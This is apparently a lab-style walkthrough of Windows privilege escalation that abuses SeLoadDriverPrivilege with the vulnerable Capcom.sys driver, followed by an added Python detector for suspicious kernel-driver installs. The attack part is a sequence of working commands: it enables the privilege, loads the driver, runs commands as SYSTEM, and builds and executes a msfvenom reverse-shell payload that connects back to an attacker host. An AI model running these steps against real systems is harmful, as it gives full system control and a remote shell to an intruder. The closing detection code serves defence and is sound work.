SeLoadDriver Privilege

The last GitHub link has all the instructions.

Upload eoploaddriver_x64.exe, the Capcom.sys driver, and ExploitCapcom.exe to a writable directory on the target machine.

First we need to enable SeLoadDriverPrivilege, which is disabled.

.\eoploaddriver_x64.exe System\CurrentControlSet\dfserv C:\Temp\Capcom.sys

Now load Capcom.sys on the target machine using ExploitCapcom.exe.

.\ExploitCapcom.exe LOAD C:\Temp\Capcom.sys

After Capcom.sys is loaded we can run any command as a privileged user with the EXPLOIT keyword.

.\ExploitCapcom.exe EXPLOIT whoami

Now we can generate a reverse shell with msfvenom (any other reverse shell payload also works). On the attacker VM:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > shell.exe

Upload it to the target machine, then execute the payload.

.\ExploitCapcom.exe EXPLOIT shell.exe

You will get a reverse shell as SYSTEM.
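As an added defender-side example (not part of the original write-up), the following Python flags service-install records (System log Event ID 7045) where a kernel driver is registered from outside the trusted driver directory or from a user-writable path, which is the footprint the steps above leave on the host. The log lines are constructed, and the Key=Value layout and the writable-directory list are assumptions.

```python
import re

# Constructed sample records (not real logs): System EID 7045 service-install
# events flattened to Key=Value form. The third mirrors the page's technique:
# a kernel driver registered from a user-writable directory.
SAMPLE_EVENTS = [
    "EventID=7045 ServiceName=Dhcp ServiceType=user ImagePath=C:\\Windows\\System32\\svchost.exe",
    "EventID=7045 ServiceName=mouclass ServiceType=kernel ImagePath=\\SystemRoot\\System32\\drivers\\mouclass.sys",
    "EventID=7045 ServiceName=dfserv ServiceType=kernel ImagePath=\\??\\C:\\Temp\\Capcom.sys",
]

# Assumption: directories a non-admin user can write to by default.
USER_WRITABLE_PREFIXES = ("c:\\temp", "c:\\users\\", "c:\\windows\\temp", "c:\\programdata")
TRUSTED_DRIVER_DIR = "c:\\windows\\system32\\drivers"

KV_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line: str) -> dict:
    """Turn one Key=Value record into a dict."""
    return dict(KV_RE.findall(line))

def normalize_path(path: str) -> str:
    """Resolve the NT-style prefixes seen in driver ImagePath values."""
    p = path.lower()
    if p.startswith("\\??\\"):
        p = p[4:]
    if p.startswith("\\systemroot\\"):
        p = "c:\\windows\\" + p[len("\\systemroot\\"):]
    elif p.startswith("system32\\"):
        p = "c:\\windows\\" + p
    return p

def is_suspicious_driver(event: dict) -> bool:
    """True when a kernel driver lives outside the trusted driver directory
    or under a path an unprivileged user could have written to."""
    if event.get("EventID") != "7045" or event.get("ServiceType") != "kernel":
        return False
    path = normalize_path(event.get("ImagePath", ""))
    outside_trusted = not path.startswith(TRUSTED_DRIVER_DIR + "\\")
    user_writable = path.startswith(USER_WRITABLE_PREFIXES)
    return outside_trusted or user_writable

def find_suspicious(lines):
    """Return (ServiceName, ImagePath) for every flagged record."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_suspicious_driver(ev):
            hits.append((ev["ServiceName"], ev["ImagePath"]))
    return hits

if __name__ == "__main__":
    for name, path in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT kernel driver '{name}' registered from untrusted path: {path}")
```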
